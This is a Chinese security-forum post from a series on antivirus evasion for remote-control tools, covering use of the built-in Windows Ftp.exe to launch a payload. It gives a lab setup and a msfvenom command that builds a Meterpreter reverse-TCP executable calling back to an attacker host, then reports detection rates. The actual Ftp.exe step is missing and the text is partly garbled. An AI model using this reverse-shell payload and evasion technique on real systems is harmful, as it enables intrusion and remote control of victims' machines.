安全矩阵

 找回密码
 立即注册
搜索
查看: 2542|回复: 0

远控免杀专题(41)-白名单Ftp.exe执行payload

[复制链接]

8

主题

8

帖子

62

积分

注册会员

Rank: 2

积分
62
发表于 2020-3-7 22:50:38 | 显示全部楼层 |阅读模式
一、Ftp.exe简介
Ftp.exe是Windows本身⾃自带的⼀一个程序,属于微软FTP⼯工具,提供基本的FTP访问。
Ftp.exe所在路路径已被系统添加PATH环境变量量中。因此,Ftp.exe命令可识别。
Windows 2003 默认位置:
  1. C:\Windows\System32\ftp.exe
  2. C:\Windows\SysWOW64\ftp.exe
复制代码
Windows 7 默认位置:
  1. C:\Windows\System32\ftp.exe
  2. C:\Windows\SysWOW64\ftp.exe
复制代码
由于⽩白名单加载payload的免杀测试需要结合杀软的⾏行行为检测才合理理,查杀⽩白名单⽂文
件都没有任何意义,payload⽂文件的查杀率依赖于对payload的免杀处理理,所以这⾥里里
对⽩白名单程序的免杀效果不不做评判。


二、使⽤用Ftp.exe执⾏行行Payload
复现环境:
靶机win7
攻击机 kali 192.168.19.128

1、配置攻击机MSF;


2、使⽤用msfvenom⽣生成shellcode;
  1. msfvenom -a x86 --platform windows -p
  2. windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=4444 -f
  3. exe > shellcode.exe
复制代码

3、靶机执⾏行行恶意shellcode;




三、总结

由于shellcode.exe使⽤用msfvenom⽣生成的原⽣生态shellcode,因此360、⽕火绒均会报警。

由于shellcode的源码使⽤用msfvenom⽣生成,所以VT查杀相对较⾼高,查杀率:48/61。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:44 , Processed in 0.013377 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表